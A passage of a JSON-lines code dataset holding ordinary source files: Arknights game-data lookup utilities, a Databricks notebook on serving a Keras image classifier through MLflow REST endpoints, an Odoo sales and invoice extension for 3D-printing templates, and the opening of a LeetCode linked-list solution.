operator_list\r\n\r\n\r\nitem_table = None\r\n\r\n\r\ndef get_item(item: str) -> dict:\r\n \"\"\"\r\n Grabs detailed item info (search by name or ID)\r\n\r\n Args:\r\n item (str): Item name or ID\r\n\r\n Returns:\r\n dict: A dict that contains item info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if item_table is already loaded and load it from local file\r\n global item_table\r\n if item_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/item_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n item_table = json.load(f)\r\n\r\n # Get item list from table\r\n item_list = item_table[\"items\"]\r\n return max(\r\n list(item_list.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], item), ratio(x[\"itemId\"], item)),\r\n )\r\n\r\n\r\nstage_table = None\r\n\r\n\r\ndef get_stage(stage: str) -> Tuple[dict, dict, Optional[dict]]:\r\n \"\"\"\r\n Grabs detailed stage info (search by name, code or ID)\r\n\r\n Args:\r\n stage (str): stage (str): Stage name, code or ID\r\n\r\n Returns:\r\n Tuple[dict, dict, Optional[dict]]: A tuple of dict that contains stage info with name, code or ID that matches the parameter. 
\r\n Last variable is a dict if stage is annihilation\r\n \"\"\"\r\n\r\n # Check if stage_table is already loaded and load it from local file\r\n global stage_table\r\n if stage_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/stage_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n stage_table = json.load(f)\r\n\r\n # Get stage list\r\n stage_list = stage_table[\"stages\"]\r\n\r\n stage_info = max(\r\n list(stage_list.values()),\r\n key=lambda x: max(\r\n # Match ID\r\n ratio(x[\"stageId\"], stage),\r\n # Match code\r\n ratio(x[\"code\"], stage),\r\n # Match name\r\n ratio(x[\"name\"] or \"\", stage),\r\n ),\r\n )\r\n\r\n # Additional info\r\n stage_extra_info = None\r\n with open(f'ArknightsData/{locale}/gamedata/levels/{stage_info[\"levelId\"].lower()}.json', \"r\", encoding=\"UTF-8\") as f:\r\n stage_extra_info = json.load(f)\r\n\r\n # Annihilatio\r\n anni_info = None\r\n if stage_info[\"stageType\"] == \"CAMPAIGN\":\r\n anni_info = stage_table[\"campaigns\"][stage_info[\"stageId\"]]\r\n\r\n return (stage_info, stage_extra_info, anni_info)\r\n\r\n\r\ndef get_stage_with_item(id: str) -> List[dict]:\r\n \"\"\"\r\n Grabs stages that drops item with id\r\n\r\n Args:\r\n id (str): Item ID (input must be correct)\r\n\r\n Returns:\r\n List[dict]: A list that contains tuple (stage that drop item with ID, probability of item dropping)\r\n \"\"\"\r\n\r\n # Check if stage_table is already loaded and load it from local file\r\n global stage_table\r\n if stage_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/stage_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n stage_table = json.load(f)\r\n\r\n # Get stage list\r\n stage_list = stage_table[\"stages\"]\r\n\r\n def get_index(lst: list) -> Optional[int]:\r\n \"\"\"\r\n Get index of item that has the same ID with given ID in item drop list of stage\r\n Returns None if item is not in list\r\n \"\"\"\r\n return next((idx for (idx, dt) in enumerate(\r\n lst) if dt[\"id\"] == id), None)\r\n\r\n return [\r\n (\r\n # Stage info\r\n x,\r\n # Item drop type (Probability of dropping)\r\n # I'm sure there are better ways to do this but i'm a noob\r\n x[\"stageDropInfo\"][\"displayDetailRewards\"][\r\n get_index(x[\"stageDropInfo\"][\"displayDetailRewards\"])\r\n ][\"dropType\"],\r\n )\r\n for x in list(stage_list.values())\r\n # Check if item is in list\r\n if get_index(x[\"stageDropInfo\"][\"displayDetailRewards\"]) is not None\r\n ]\r\n\r\n\r\nbuilding_data = None\r\n\r\n\r\ndef get_furniture(furniture: str) -> dict:\r\n \"\"\"\r\n Grabs detailed furniture info (search by name or ID)\r\n\r\n Args:\r\n furniture (str): Furniture name or ID\r\n\r\n Returns:\r\n dict: A dict that contains furniture info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if building_data is already loaded and load it from local file\r\n global building_data\r\n if building_data is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/building_data.json\", \"r\", encoding=\"UTF-8\") as f:\r\n building_data = json.load(f)\r\n\r\n # Get furniture list\r\n furniture_list = building_data[\"customData\"][\"furnitures\"]\r\n return max(\r\n list(furniture_list.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], furniture),\r\n ratio(x[\"id\"], furniture)),\r\n )\r\n\r\n\r\nenemy_handbook_table = None\r\n\r\n\r\ndef get_enemy(enemy: str) -> dict:\r\n \"\"\"\r\n Grabs detailed enemy info (search by name or ID)\r\n\r\n Args:\r\n enemy (str): Enemy name or ID\r\n\r\n Returns:\r\n dict: A dict that 
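`get_index` in `get_stage_with_item` above packs a useful idiom: `next` over an enumerated generator, with a `None` default to swallow the would-be `StopIteration`. On its own:

```python
from typing import Optional

def index_of(items: list, target_id: str) -> Optional[int]:
    # next() pulls the first matching index; the None default avoids the
    # StopIteration that next() would otherwise raise on no match.
    return next((i for i, d in enumerate(items) if d["id"] == target_id), None)

drops = [{"id": "30011"}, {"id": "30012"}]
print(index_of(drops, "30012"))  # 1
print(index_of(drops, "99999"))  # None
```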
contains enemy info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if enemy_handbook_table is already loaded and load it from local\r\n # file\r\n global enemy_handbook_table\r\n if enemy_handbook_table is None:\r\n with open(\r\n f\"ArknightsData/{locale}/gamedata/excel/enemy_handbook_table.json\", \"r\"\r\n ) as f:\r\n enemy_handbook_table = json.load(f)\r\n\r\n return max(\r\n list(enemy_handbook_table.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], enemy), ratio(x[\"enemyId\"], enemy)),\r\n )\r\n\r\n\r\ntip_table = None\r\n\r\n\r\ndef get_tips(category: str) -> dict:\r\n \"\"\"\r\n Grabs a random tip (with or without category)\r\n\r\n Args:\r\n category (str): Category of tip (optional) (must be correct)\r\n\r\n Returns:\r\n dict: A dict that contains tip about given category\r\n \"\"\"\r\n\r\n # Check if tip_table is already loaded and load it from local file\r\n global tip_table\r\n if tip_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/tip_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n tip_table = json.load(f)\r\n\r\n # Get tip list\r\n tip_list = tip_table[\"tips\"]\r\n\r\n # Random tip\r\n return random.choice(\r\n tip_list\r\n if category is None\r\n else [x for x in tip_list if x[\"category\"] == category.upper()]\r\n )\r\n","sub_path":"amiya/utils/arknights.py","file_name":"arknights.py","file_ext":"py","file_size_in_byte":15261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"59240944","text":"# Databricks notebook source\n# MAGIC \n# MAGIC %md-sandbox\n# MAGIC \n# MAGIC
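
The Arknights lookup helpers in the record above all share one pattern: lazily cache a gamedata JSON table in a module-level global, then take `max(...)` over a `ratio` string-similarity score to pick the closest entry. A minimal, self-contained sketch of that pattern — `difflib.SequenceMatcher` stands in for whichever `ratio` implementation the module actually imports, and the file path and field names here are illustrative:

```python
import json
from difflib import SequenceMatcher
from typing import Optional

_table: Optional[dict] = None  # module-level cache, mirroring stage_table/building_data above

def _ratio(a: str, b: str) -> float:
    # Stand-in for the module's imported `ratio`: a 0.0-1.0 string similarity.
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def lookup(query: str, path: str = "data/table.json") -> dict:
    """Return the table entry whose name or id best fuzzy-matches `query`."""
    global _table
    if _table is None:  # load once, reuse on every later call
        with open(path, "r", encoding="UTF-8") as f:
            _table = json.load(f)
    return max(
        _table.values(),
        key=lambda x: max(_ratio(x.get("name") or "", query),
                          _ratio(x.get("id") or "", query)),
    )
```

One caveat the sketch shares with the originals: `max` always returns *some* entry, so even a nonsense query yields the least-bad match rather than an error; a minimum-score threshold is a cheap guard against that.
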
\n# MAGIC \"Databricks\n# MAGIC
\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Model Serving\n# MAGIC \n# MAGIC There are many deployment options for machine learning models. This notebook explores a more complex deployment scenario involving the real time deployment of a convolutional neural network using REST and Databricks MLflow Model Serving.\n# MAGIC \n# MAGIC ## ![Spark Logo Tiny](https://files.training.databricks.com/images/105/logo_spark_tiny.png) In this lesson you:
\n# MAGIC - Create a `pyfunc` to serve a `keras` model with pre and post processing logic\n# MAGIC - Save the `pyfunc` for downstream consumption \n# MAGIC - Serve the model using a REST endpoint\n\n# COMMAND ----------\n\n# MAGIC %run \"./Includes/Classroom-Setup\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Model Serving in Databricks\n# MAGIC \n# MAGIC The MLflow model registry in Databricks is now integrated with MLflow Model Serving. This is currently intended for development use cases and is therefore not intended for production. In this module, you will create a wrapper class around a `keras` model that provides custom pre and post processing logic necessary for this more complex deployment scenario. \n# MAGIC \n# MAGIC For additional background, see the following resources:\n# MAGIC \n# MAGIC - [Databricks blog on model serving](https://databricks.com/blog/2020/06/25/announcing-mlflow-model-serving-on-databricks.html)\n# MAGIC - [Example of an image classifier](https://github.com/mlflow/mlflow/tree/master/examples/flower_classifier)\n# MAGIC - [Example of a custom loader used with XGBoost](https://www.mlflow.org/docs/latest/models.html#example-saving-an-xgboost-model-in-mlflow-format)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Creating a Wrapper Class using `pyfunc`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a `keras` model using a reference architecture and pretrained weights.\n\n# COMMAND ----------\n\nimport tensorflow as tf\n\ntf.random.set_seed(42)\n\ndef get_model():\n img_height = 224\n img_width = 224\n\n return tf.keras.applications.VGG16(weights=\"imagenet\", input_shape=(img_height, img_width, 3))\n \nmodel = get_model()\n\nmodel.summary()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a small dataset to test the model. This is two images of cats.\n\n# COMMAND ----------\n\nimport pandas as pd\nimport base64\n\nfilenames = [\"/dbfs/mnt/training/dl/img/cats/cats2.jpg\", \"/dbfs/mnt/training/dl/img/cats/cats4.jpg\"]\n\ndef read_image(path: str) -> bytes:\n ''' Reads an image from a path and returns the contents in bytes '''\n with open(path, \"rb\") as f:\n image_bytes = f.read()\n return image_bytes\n\ndata = pd.DataFrame(data=[base64.encodebytes(read_image(x)) for x in filenames], columns=[\"image\"])\ndata\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Save the model using `mlflow`.\n\n# COMMAND ----------\n\nimport mlflow\nimport mlflow.keras\nimport uuid\n\nmodel_name = f\"keras_model_{uuid.uuid4().hex[:10]}\"\n\nwith mlflow.start_run() as run:\n mlflow.keras.log_model(artifact_path=model_name, keras_model=model)\n \n model_uri = f\"runs:/{run.info.run_id}/{model_name}\"\n \nprint(f\"Model saved to {model_uri}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a wrapper class that includes the following as a `pyfunc`:\n# MAGIC \n# MAGIC - A `load_context` method to load in the model. 
Note this is necessary because you cannot serialize a `keras` model directly using `cloudpickle`, so we need to load the model in a different way.\n# MAGIC - Custom featurization logic that parses base64 encoded images (necessary for HTTP requests)\n# MAGIC - Custom prediction logic that reports the top class and its probability\n\n# COMMAND ----------\n\nimport mlflow\n\nclass KerasImageClassifierPyfunc(mlflow.pyfunc.PythonModel):\n \n def __init__(self):\n self.model = None\n self.img_height = 224\n self.img_width = 224\n \n def load_context(self, context=None, path=None):\n '''\n When loading a pyfunc, this method runs automatically with the related\n context. This method is designed to load the keras model from a path \n if it is running in a notebook or use the artifact from the context\n if it is loaded with mlflow.pyfunc.load_model()\n '''\n import numpy as np\n import tensorflow as tf\n \n if context: # This block executes for server run\n model_path = context.artifacts[\"keras_model\"]\n else: # This block executes for notebook run\n model_path = path\n \n self.model = mlflow.keras.load_model(model_path)\n \n def predict_from_bytes(self, image_bytes):\n '''\n Applied across numpy representations of the model input, this method\n uses the appropriate decoding based upon whether it is run in the \n notebook or on a server\n '''\n import base64\n \n try: # This block executes for notebook run\n image_bytes_decoded = base64.decodebytes(image_bytes)\n img_array = tf.image.decode_image(image_bytes_decoded)\n except: # This block executes for server run\n img_array = tf.image.decode_image(image_bytes) \n \n img_array = tf.image.resize(img_array, (self.img_height, self.img_width))\n img_array = tf.expand_dims(img_array, 0)\n prediction = self.model.predict(img_array)\n return prediction[0]\n \n def postprocess_raw_predictions(self, raw_prediction):\n '''\n Post processing logic to render predictions in a human readable form\n '''\n from tensorflow.keras.applications.vgg16 import decode_predictions\n \n res = decode_predictions(raw_prediction, top=3)\n str_template = \"Best response of {best} with probability of {p}\"\n return [str_template.format(best=i[0][1], p=i[0][2]) for i in res]\n\n def predict(self, context=None, model_input=None):\n '''\n Wrapper predict method\n '''\n n_records = model_input.shape[0]\n \n input_numpy = model_input.values\n raw_predictions = np.vectorize(self.predict_from_bytes, otypes=[np.ndarray])(input_numpy)\n raw_predictions = np.array(raw_predictions.tolist()).reshape([n_records, 1000])\n \n decoded_predictions = self.postprocess_raw_predictions(raw_predictions)\n decoded_predictions = pd.DataFrame(decoded_predictions, columns=[\"prediction\"])\n decoded_predictions.index = model_input.index\n return decoded_predictions\n\nclassifier_pyfunc = KerasImageClassifierPyfunc()\nclassifier_pyfunc.load_context(path=model_uri) # This will run automatically when using mlflow.pyfunc.load_model()\n\noutput = classifier_pyfunc.predict(model_input=data)\noutput\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Toilet tissue? Take a look at the images to see why the model predicted these classes. 
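
As a quick sanity check of the wrapper's notebook code path, here is a minimal sketch of pushing one image through it, reusing one of the notebook's own test files (`classifier_pyfunc` is the instance built above; the exact prediction string will vary):

```python
import base64
import pandas as pd

# One of the notebook's own test images; any RGB JPEG/PNG that
# tf.image.decode_image can read would work here.
sample_path = "/dbfs/mnt/training/dl/img/cats/cats2.jpg"

with open(sample_path, "rb") as f:
    encoded = base64.encodebytes(f.read())  # predict_from_bytes decodes this branch

single = pd.DataFrame({"image": [encoded]})
print(classifier_pyfunc.predict(model_input=single))
# -> a one-row DataFrame like "Best response of <class> with probability of <p>"
```
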
Note the confidence of the prediction.\n\n# COMMAND ----------\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimg = mpimg.imread(filenames[0]) # The \"toilet tissue\"\nplt.imshow(img)\n\n# COMMAND ----------\n\nimg = mpimg.imread(filenames[1]) # The \"tabby\"\nplt.imshow(img)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Save the `pyfunc` with Dependencies\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a model signature to document model inputs and outputs.\n\n# COMMAND ----------\n\nfrom mlflow.models.signature import infer_signature\n\nsignature = infer_signature(data, output)\n\nsignature\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create the Conda environment for all the `pyfunc`'s dependencies.\n\n# COMMAND ----------\n\nimport cloudpickle\nimport tensorflow.keras\nfrom sys import version_info\nimport tensorflow as tf\n\nconda_env = {\n \"channels\": [\"defaults\"],\n \"dependencies\": [\n f\"python={version_info.major}.{version_info.minor}.{version_info.micro}\",\n \"pip\",\n {\"pip\": [\n \"mlflow\",\n f\"tensorflow=={tf.__version__}\",\n f\"cloudpickle==1.2.2\", # Forcing cloudpickle version due to serialization issue\n f\"keras=={tensorflow.keras.__version__}\" # Need both tensorflow and keras due to mlflow dependency\n ],\n },\n ],\n \"name\": \"keras_env\"\n}\n\nconda_env\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create associated artifacts. Note that we cannot serialize `keras` models using the default `cloudpickle` so we'll instead read in the model using `keras` when the Python function is loaded.\n\n# COMMAND ----------\n\nartifacts = {\n \"keras_model\": model_uri\n}\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Log the `pyfunc` including the artifacts, environment, signature, and input example.\n\n# COMMAND ----------\n\nmlflow_pyfunc_model_path = f\"{userhome}/{model_name}\"\n\nmlflow.pyfunc.save_model(\n path=mlflow_pyfunc_model_path, \n python_model=KerasImageClassifierPyfunc(), \n artifacts=artifacts,\n conda_env=conda_env,\n signature=signature,\n input_example=data\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Load the model back in and test on a sample of the data.\n\n# COMMAND ----------\n\nloaded_model = mlflow.pyfunc.load_model(mlflow_pyfunc_model_path)\nloaded_model.predict(data)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Log to the Model Registry and Serve using REST\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Log to the model registry.\n\n# COMMAND ----------\n\nmlflow.register_model(model_uri=mlflow_pyfunc_model_path.replace(\"/dbfs\", \"dbfs:\"), name=model_name)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Load from the model registry to confirm the registration is complete.\n\n# COMMAND ----------\n\nimport time\n\nmodel_version_uri = f\"models:/{model_name}/1\"\n\nwhile True:\n try:\n model_version_1 = mlflow.pyfunc.load_model(model_version_uri)\n break\n except:\n print(f\"Model not ready yet. Sleeping...\")\n time.sleep(10)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Enable cluster serving. 
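
The `while True` poll above never gives up, so a failed registration would leave the cell spinning forever. A sketch of the same wait with a bounded timeout — `load_when_ready` is our name for it, not an MLflow API:

```python
import time
import mlflow

def load_when_ready(model_uri: str, timeout_s: int = 300, interval_s: int = 10):
    """Poll mlflow.pyfunc.load_model until it succeeds or timeout_s elapses."""
    deadline = time.time() + timeout_s
    while True:
        try:
            return mlflow.pyfunc.load_model(model_uri)
        except Exception as exc:
            if time.time() >= deadline:
                raise TimeoutError(f"{model_uri} not ready after {timeout_s}s") from exc
            print("Model not ready yet. Sleeping...")
            time.sleep(interval_s)

# model_version_1 = load_when_ready(f"models:/{model_name}/1")
```
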
**This will create a dedicated VM to serve this model** so be sure to shut it down when you're done.\n\n# COMMAND ----------\n\nimport requests\n\ntoken = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().getOrElse(None)\ninstance = dbutils.notebook.entry_point.getDbutils().notebook().getContext().tags().apply('browserHostName')\nheaders = {'Authorization': f'Bearer {token}'}\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/enable'\n\nr = requests.post(url, headers=headers, json={\"registered_model_name\": model_name})\nr.status_code\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Get cluster serving status. This will wait until the endpoint is ready.\n\n# COMMAND ----------\n\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/get-status'\n\nwhile True:\n r = requests.get(url, headers=headers, json={\"registered_model_name\": model_name})\n if r.json().get(\"endpoint_status\")['state'] != \"ENDPOINT_STATE_READY\":\n print(f\"Endpoint not ready yet. Sleeping...\")\n time.sleep(10)\n else:\n print(f\"Endpoint READY\")\n break\n\nr.json()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Score using the REST endpoint and wait until it's ready.\n# MAGIC \n# MAGIC **Note:** this code could fail if the Conda environment is not fully running yet. Retry if you receive a 404 error.\n\n# COMMAND ----------\n\nimport os\nimport pandas as pd\n\ndef score_model(data: pd.DataFrame, model_name: str):\n token = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().getOrElse(None)\n instance = dbutils.notebook.entry_point.getDbutils().notebook().getContext().tags().apply('browserHostName')\n url = f'https://{instance}/model/{model_name}/1/invocations'\n headers = {'Authorization': f'Bearer {token}'}\n data_json = data.to_dict(orient='split')\n response = requests.request(method='POST', headers=headers, url=url, json=data_json)\n if response.status_code != 200:\n raise Exception(f'Request failed with status {response.status_code}, {response.text}')\n return response.json()\n\nwhile True:\n try:\n print(score_model(data, model_name))\n break\n except:\n print(f\"Conda environment still building. Sleeping...\")\n time.sleep(10)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Confirm the endpoint is running.\n\n# COMMAND ----------\n\nscore_model(data, model_name)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Disable cluster serving. **This will shut down the model serving endpoint.**\n\n# COMMAND ----------\n\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/disable'\nrequests.post(url, headers=headers, json={\"registered_model_name\": model_name})\n\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2021 Databricks, Inc. All rights reserved.
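
The `score_model` helper above depends on `dbutils` for the host and token, so it only runs inside a notebook. For completeness, a sketch of the same POST from any Python client — the `DATABRICKS_HOST`/`DATABRICKS_TOKEN` environment variables and the local image path are assumptions, and the payload mirrors the `orient='split'` format used above:

```python
import base64
import os

import pandas as pd
import requests

host = os.environ["DATABRICKS_HOST"]    # workspace hostname (assumed env var)
token = os.environ["DATABRICKS_TOKEN"]  # personal access token (assumed env var)

def score(df: pd.DataFrame, model_name: str, version: int = 1) -> dict:
    resp = requests.post(
        f"https://{host}/model/{model_name}/{version}/invocations",
        headers={"Authorization": f"Bearer {token}"},
        json=df.to_dict(orient="split"),  # same payload shape as score_model above
        timeout=60,
    )
    resp.raise_for_status()
    return resp.json()

with open("cat.jpg", "rb") as f:  # any local test image
    df = pd.DataFrame({"image": [base64.encodebytes(f.read()).decode()]})
print(score(df, "keras_model_0123456789"))  # substitute the registered model name
```

The `.decode()` matters here because a JSON body can only carry strings, not raw bytes.
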
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support","sub_path":"4. useful_code/Data + AI Summit 2021/Scaling Deep Learning with TensorFlow and Apache Spark/Python/DL 09b - Model Serving.py","file_name":"DL 09b - Model Serving.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391280696","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Haresh Kansara\n# Copyright (C) 2020-TODAY Haresh Kansara(hareshkansara00@gmail.com).\n# Author: Haresh Kansara(hareshkansara00@gmail.com).\n# you can modify it under the terms of the GNU LESSER\n# GENERAL PUBLIC LICENSE (LGPL v3), Version 3.\n#\n# It is forbidden to publish, distribute, sublicense, or sell copies\n# of the Software or modified copies of the Software.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU LESSER GENERAL PUBLIC LICENSE (LGPL v3) for more details.\n#\n# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE\n# GENERAL PUBLIC LICENSE (LGPL v3) along with this program.\n# If not, see .\n#\n##############################################################################\n\nfrom odoo.tools.misc import get_lang\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrderTemplate(models.Model):\n\n _inherit = 'sale.order.template'\n\n is_printing_inv = fields.Boolean(string='Is Printing Template?')\n\n\nclass AccountMove(models.Model):\n\n _inherit = 'account.move'\n\n is_printing_inv = fields.Boolean(string='Is Printing Invoice?')\n\n def action_invoice_sent(self):\n \"\"\" Open a window to compose an email, with the edi invoice template\n message loaded by default\n \"\"\"\n self.ensure_one()\n template = self.env.ref('account.email_template_edi_invoice', raise_if_not_found=False)\n if self.is_printing_inv:\n template_rec = self.env['mail.template'].sudo().search([('name', 'ilike', '3D-Printing-Service-Invoice: Send by email')], limit=1)\n if template_rec:\n template = template_rec\n lang = get_lang(self.env)\n if template and template.lang:\n lang = template._render_template(template.lang, 'account.move', self.id)\n else:\n lang = lang.code\n compose_form = self.env.ref('account.account_invoice_send_wizard_form', raise_if_not_found=False)\n ctx = dict(\n default_model='account.move',\n default_res_id=self.id,\n # For the sake of consistency we need a default_res_model if\n # default_res_id is set. 
Not renaming default_model as it can\n # create many side-effects.\n default_res_model='account.move',\n default_use_template=bool(template),\n default_template_id=template and template.id or False,\n default_composition_mode='comment',\n mark_invoice_as_sent=True,\n custom_layout=\"mail.mail_notification_paynow\",\n model_description=self.with_context(lang=lang).type_name,\n force_email=True\n )\n return {\n 'name': _('Send Invoice'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.invoice.send',\n 'views': [(compose_form.id, 'form')],\n 'view_id': compose_form.id,\n 'target': 'new',\n 'context': ctx,\n }\n\n\nclass SaleOrder(models.Model):\n\n _inherit = 'sale.order'\n\n is_printing_inv = fields.Boolean(string='Is Printing Template?', store=True, related='sale_order_template_id.is_printing_inv')\n\n def _find_mail_template(self, force_confirmation_template=False):\n template_id = False\n\n if force_confirmation_template or (self.state == 'sale' and not self.env.context.get('proforma', False)):\n template_id = int(self.env['ir.config_parameter'].sudo().get_param('sale.default_confirmation_template'))\n template_id = self.env['mail.template'].search([('id', '=', template_id)]).id\n if not template_id:\n template_id = self.env['ir.model.data'].xmlid_to_res_id('sale.mail_template_sale_confirmation', raise_if_not_found=False)\n if not template_id:\n template_id = self.env['ir.model.data'].xmlid_to_res_id('sale.email_template_edi_sale', raise_if_not_found=False)\n if self.is_printing_inv:\n template = self.env['mail.template'].search([('name', '=', 'Sales Order 3D Printing Service')], limit=1)\n if template:\n template_id = template.id\n\n return template_id\n\n def _prepare_invoice(self):\n \"\"\"\n Prepare the dict of values to create the new invoice for a sales order. 
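
As the remainder of this docstring notes, downstream modules are meant to extend this method while keeping the `super()` chain intact rather than replacing it wholesale. A minimal sketch of that pattern — the class name and the field being tweaked are illustrative, not part of this module:

```python
from odoo import models

class SaleOrderInvoiceNotes(models.Model):
    _inherit = 'sale.order'

    def _prepare_invoice(self):
        # Take the base values first, so every module in the chain contributes...
        invoice_vals = super()._prepare_invoice()
        # ...then layer this module's additions on top.
        invoice_vals['narration'] = (invoice_vals.get('narration') or '') + '\nReviewed by QA'
        return invoice_vals
```
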
This method may be\n overridden to implement custom invoice generation (making sure to call super() to establish\n a clean extension chain).\n \"\"\"\n self.ensure_one()\n # ensure a correct context for the _get_default_journal method and company-dependent fields\n self = self.with_context(default_company_id=self.company_id.id, force_company=self.company_id.id)\n journal = self.env['account.move'].with_context(default_type='out_invoice')._get_default_journal()\n if not journal:\n raise UserError(_('Please define an accounting sales journal for the company %s (%s).') % (self.company_id.name, self.company_id.id))\n\n invoice_vals = {\n 'is_printing_inv': self.is_printing_inv,\n 'ref': self.client_order_ref or '',\n 'type': 'out_invoice',\n 'narration': self.note,\n 'currency_id': self.pricelist_id.currency_id.id,\n 'campaign_id': self.campaign_id.id,\n 'medium_id': self.medium_id.id,\n 'source_id': self.source_id.id,\n 'invoice_user_id': self.user_id and self.user_id.id,\n 'team_id': self.team_id.id,\n 'partner_id': self.partner_invoice_id.id,\n 'partner_shipping_id': self.partner_shipping_id.id,\n 'invoice_partner_bank_id': self.company_id.partner_id.bank_ids[:1].id,\n 'fiscal_position_id': self.fiscal_position_id.id or self.partner_invoice_id.property_account_position_id.id,\n 'journal_id': journal.id, # company comes from the journal\n 'invoice_origin': self.name,\n 'invoice_payment_term_id': self.payment_term_id.id,\n 'invoice_payment_ref': self.reference,\n 'transaction_ids': [(6, 0, self.transaction_ids.ids)],\n 'invoice_line_ids': [],\n 'company_id': self.company_id.id,\n }\n return invoice_vals\n\n\nclass SaleAdvancePaymentInv(models.TransientModel):\n\n _inherit = \"sale.advance.payment.inv\"\n\n def _prepare_invoice_values(self, order, name, amount, so_line):\n invoice_vals = {\n 'is_printing_inv': order.is_printing_inv,\n 'ref': order.client_order_ref,\n 'type': 'out_invoice',\n 'invoice_origin': order.name,\n 'invoice_user_id': order.user_id.id,\n 'narration': order.note,\n 'partner_id': order.partner_invoice_id.id,\n 'fiscal_position_id': order.fiscal_position_id.id or order.partner_id.property_account_position_id.id,\n 'partner_shipping_id': order.partner_shipping_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'invoice_payment_ref': order.reference,\n 'invoice_payment_term_id': order.payment_term_id.id,\n 'invoice_partner_bank_id': order.company_id.partner_id.bank_ids[:1].id,\n 'team_id': order.team_id.id,\n 'campaign_id': order.campaign_id.id,\n 'medium_id': order.medium_id.id,\n 'source_id': order.source_id.id,\n 'invoice_line_ids': [(0, 0, {\n 'name': name,\n 'price_unit': amount,\n 'quantity': 1.0,\n 'product_id': self.product_id.id,\n 'product_uom_id': so_line.product_uom.id,\n 'tax_ids': [(6, 0, so_line.tax_id.ids)],\n 'sale_line_ids': [(6, 0, [so_line.id])],\n 'analytic_tag_ids': [(6, 0, so_line.analytic_tag_ids.ids)],\n 'analytic_account_id': order.analytic_account_id.id or False,\n })],\n }\n\n return invoice_vals\n","sub_path":"custom_print_report/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"278586688","text":"# Prompt: https://leetcode.com/problems/middle-of-the-linked-list/submissions/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def middleNode(self, head: ListNode) -> ListNode:\n node = head\n count = 0\n # find total 
